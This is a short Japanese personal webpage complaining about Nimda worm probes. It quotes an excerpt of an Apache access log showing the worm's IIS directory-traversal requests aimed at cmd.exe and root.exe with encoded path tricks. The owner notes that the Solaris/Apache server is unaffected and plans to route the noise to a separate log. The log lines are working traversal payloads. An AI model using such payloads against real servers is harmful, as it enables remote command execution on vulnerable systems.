Go to TOP Page
Google:

□Nimda

○ちゃんとウィルス対策しなさいよ。ミタイな。

ひたすらコマンドインタプリタを探して見つかったら、よからぬ事をするつもりなのでしょう。
試しに、探してるレポジトリに仕込んでみるか? みたいな衝動にかられるのですけれど(^^;)

log の一例
***.***.***.*** - - [20/Aug/2003:05:30:07 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
***.***.***.*** - - [20/Aug/2003:05:30:08 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
***.***.***.*** - - [20/Aug/2003:05:30:10 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
***.***.***.*** - - [20/Aug/2003:05:30:11 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
***.***.***.*** - - [20/Aug/2003:05:30:12 +0900] "GET / HTTP/1.1" 200 3881
***.***.***.*** - - [20/Aug/2003:05:30:13 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
***.***.***.*** - - [20/Aug/2003:05:30:14 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
***.***.***.*** - - [20/Aug/2003:05:30:15 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
***.***.***.*** - - [20/Aug/2003:05:30:16 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
***.***.***.*** - - [20/Aug/2003:05:30:18 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
***.***.***.*** - - [20/Aug/2003:05:30:19 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
***.***.***.*** - - [20/Aug/2003:05:30:20 +0900] "GET / HTTP/1.1" 200 3881
***.***.***.*** - - [20/Aug/2003:05:30:21 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
***.***.***.*** - - [20/Aug/2003:05:30:23 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
***.***.***.*** - - [20/Aug/2003:05:30:24 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
***.***.***.*** - - [20/Aug/2003:05:30:25 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
***.***.***.*** - - [20/Aug/2003:05:30:26 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
***.***.***.*** - - [20/Aug/2003:05:30:28 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

Windows IIS を狙っているだけに Solaris の Apache には影響ナシです。
ただ、 access_log に大量にログが残るのは、好きくないので、 別の log に書き出すようにしませう。

もう、ホントにいーかげんにしてください。(TT)
Windows なんて使ってないの。
いーかげんに解れ



go back    next
Copyright(c) ORATORIO-TANGRAM.com 2001-2007 All Rights Reserved.
Total:counter